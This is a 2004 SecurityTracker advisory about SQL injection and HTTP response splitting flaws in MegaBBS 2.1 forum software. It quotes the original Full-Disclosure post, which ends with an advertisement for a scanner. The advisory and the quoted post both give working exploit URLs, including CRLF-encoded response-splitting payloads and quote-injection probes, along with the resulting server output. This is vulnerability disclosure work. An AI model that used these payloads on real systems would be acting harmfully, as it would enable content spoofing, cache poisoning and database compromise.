MegaBBS Input Validation Errors Let Remote Users Inject SQL Commands and Conduct Response Splitting Attacks
|
|
SecurityTracker Alert ID: 1011420
|
|
SecurityTracker URL: http://securitytracker.com/id?1011420
|
|
CVE Reference: CAN-2004-2145
, CAN-2004-2146
(Links to External Site)
|
Updated: Jul 2 2005
|
Original Entry Date: Sep 27 2004
|
Impact: Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Version(s): 2.1
|
Description: Several vulnerabilities were reported in MegaBBS. A remote user can inject SQL commands. A remote user can conduct an HTTP response splitting attack.
The 'ladder-log.asp' and 'view-profile.asp' scripts do not properly validate user-supplied input in certain parameters. A remote
user can supply a specially crafted URL to execute SQL commands on the underlying database.
Some demonstration exploit URLs are
provided:
ladder-log.asp?categoryid=1&sortby=completeddate&sortdir=1'
ladder-log.asp?categoryid=1&filter=id&criteria=1'
view-profile.asp?type=single&memberid=1'
vi
ew-profile.asp?type=team&teamid=1'
A remote user can also submit a specially crafted URL to cause the target server to return
a split response. A remote user can exploit this to spoof content on the target server, attempt to poison any intermediate web
caches, or conduct cross-site scripting attacks.
Some demonstration exploit URLs are provided:
http://www.pd9soft.com/megabbs/forums/thread-post.asp?action=writenew
&fid=%0
d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20
text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxp
atrol
%3c/html%3e%0d%0a&tid=4924&replyto=22947&displaytype=flat
http://www.pd9soft.com/megabbs/forums/thread-post.asp?fid=%0d%0aContent-Leng
th:%200%0d%0a%0d%0aHTTP/1.0%202
00%20OK%0d%0aContent-Type:%20text/html%0d%0aC
ontent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e
%0d%0a&action=writenew&displaytype=flat
|
Impact: A remote user can create a URL that, when loaded by the target user, will cause arbitrary content to be displayed.
A remote user
may be able to poison any intermediate web caches with arbitrary content.
A remote user can inject SQL commands.
|
Solution: The vendor has released a fix, available at:
http://www.pd9soft.com/
[Editor's note: It appears that the vendor has not incremented the version number in the fixed version.]
|
Vendor URL: www.pd9soft.com/megabbs-support/index.asp (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Windows (NT), Windows (2000), Windows (2003)
|
Reported By: "pigrelax" <pigrelax@yandex.ru>
|
Message History:
None.
|
Source Message Contents
|
Date: Sun, 26 Sep 2004 21:56:44 +0400
From: "pigrelax" <pigrelax@yandex.ru>
Subject: [Full-Disclosure] HTTP Response Splitting and SQL injection in megabbs forum
|
URL: http://www.pd9soft.com
Tested megabbs 2.1
1. HTTP Response Splitting
http://www.pd9soft.com/megabbs/forums/thread-post.asp?action=writenew&fid=%0
d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20
text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxp
atrol%3c/html%3e%0d%0a&tid=4924&replyto=22947&displaytype=flat
Result:
<...>
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 26 Sep 2004 14:14:02 GMT
Server: Microsoft-IIS/6.0
Location: /megabbs/forums/forum-view.asp?fid=
Content-Length: 0
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 33
<html>Scanned by Maxpatrol</html>
Content-Length: 290
Content-Type: text/html
Expires: Sun, 26 Sep 2004 14:13:02 GMT
Set-Cookie: guestID=309; path=/
Set-Cookie: ASPSESSIONIDAQRTADCB=KNEIJIEDEMJPNNKPNFONOIFL; path=/
Cache-contro
<...>
2. HTTP Response Splitting
http://www.pd9soft.com/megabbs/forums/thread-post.asp?fid=%0d%0aContent-Leng
th:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aC
ontent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e
%0d%0a&action=writenew&displaytype=flat
Result:
<...>
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 26 Sep 2004 14:34:05 GMT
Server: Microsoft-IIS/6.0
Location: /megabbs/forums/forum-view.asp?fid=
Content-Length: 0
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 33
<html>Scanned by Maxpatrol</html>
Content-Length: 290
Content-Type: text/html
Expires: Sun, 26 Sep 2004 14:33:05 GMT
Set-Cookie: guestID=421; path=/
Set-Cookie: ASPSESSIONIDAQRTADCB=HCGIJIEDMBPIHPCDJFKACJAC; path=/
Cache-contro
<...>
3. More and more SQL injection:
ladder-log.asp?categoryid=1&sortby=completeddate&sortdir=1'
ladder-log.asp?categoryid=1&filter=id&criteria=1'
view-profile.asp?type=single&memberid=1'
view-profile.asp?type=team&teamid=1'
MaxPatrol is a professional network security scanner distinguished by its
uncompromisingly high quality of scanning, optimized for effective use by
companies of any size (serving from a few to tens of thousands of nodes).
MaxPatrol developers were able quite simply to "ignore" about 40% of the
newly published vulnerabilities because their product's intelligent
algorithms had already detected them.
http://www.Maxpatrol.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
|
|
